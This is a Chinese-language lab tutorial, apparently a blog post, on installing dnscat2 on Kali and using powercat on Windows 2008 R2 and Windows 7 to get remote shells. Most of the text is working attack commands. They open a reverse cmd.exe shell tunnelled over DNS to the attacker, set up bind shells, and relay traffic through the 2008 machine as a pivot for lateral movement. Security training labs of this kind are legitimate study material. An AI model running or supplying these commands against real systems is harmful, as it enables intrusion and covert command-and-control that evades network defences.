前言
上篇说到powercat 的基本使用,但是Powercat也是一种基于DNS协议的通信工具,powercar的DNS的通信就是基于DNScat设计的(服务端就是DNScat)我们的目的就是利用服务端的DNScat与目标机器中的powercat进行交互
网络环境:
使用机器:
kali攻击机、windows 2008 R2以及windows7作为主要机器
实现目标:
(1)kali使用Dnscat以及与windows 2008 产生交互
(2)以windows 2008 作为跳板机,基于TCP协议,kali获取windows 7的shell
(3)以windows 2008作为跳板机,基于DNS协议,kali获取windows 7的shell
首先,需要在kali上安装Dnscat
git clone https://github.com/iagox86/dnscat2.git
cd ./dnscat2/server
gem install bundler
bundle install
命令虽然是这样,但是,还有有一些坑点的,
在gem中,我们需要查看以下4个依赖包有没有安装
Ecdsa、salsa20、sha3、trollop
gem list 即可查看(安装了的话,跳过这一步)
如果没有安装的话呢:
root@kali:~# gem install ecdsa
root@kali:~# gem install salsa20
root@kali:~# gem install sha3
root@kali:~# gem install trollop
安装好就行了
在bundle install安装时,出现了这样
(图片里的意思是我们不能用root用户安装,那咋棒呢,我们就创建一个管理员权限的用户)
useradd -m name
usermod -a -g sudo name
passwd name
chsh -s /bin/bash name
然后步骤做完之后,我们则切换用户就行啦
su name
在进入./dnscat2/server目录下安装
bundle install
会出现要填写密码,密码就是我们passwd name中自己设置的密码
输入密码之后,即可安装,安装完成后,想要用回root用户来使用的话,直接输入exit就可以返回
目标实现步骤:
(1)在kali的./dnscat2/server目录下输入
ruby dnscat2.rb ttpowercat.test -e open --no-cache
就可以进入dnscat运行界面之后
在windows 2008 中输入
powercat -c 192.168.206.129 -p 53 -dns ttpowercat.test -e cmd.exe
kali 即可收到会话,后输入session -i 1
(2)在windows 7 中执行命令:
Powercat -l -v -p 9999 -e cmd.exe
在windows 2008 中执行命令:
Powercat -l -p 8888 -r tcp:10.1.1.4:9999
然后再Kali 攻击机中输入命令:
nc 192.168.206.129 -p 8888 -v
(3)kali中再/dnscat2/server目录下输入
ruby dnscat2.rb ttpowercat.test -e open --no-cache
windows 2008 中输入:
powercat -l -p 8888 -r -dns:192.168.206.131::ttpowercat.test
然后windows 7 中输入:
powercat -c 10.1.1.3 -p 8888 -v -e cmd.exe
执行成功之后,我们的kali攻击机即可获得session,效果如图: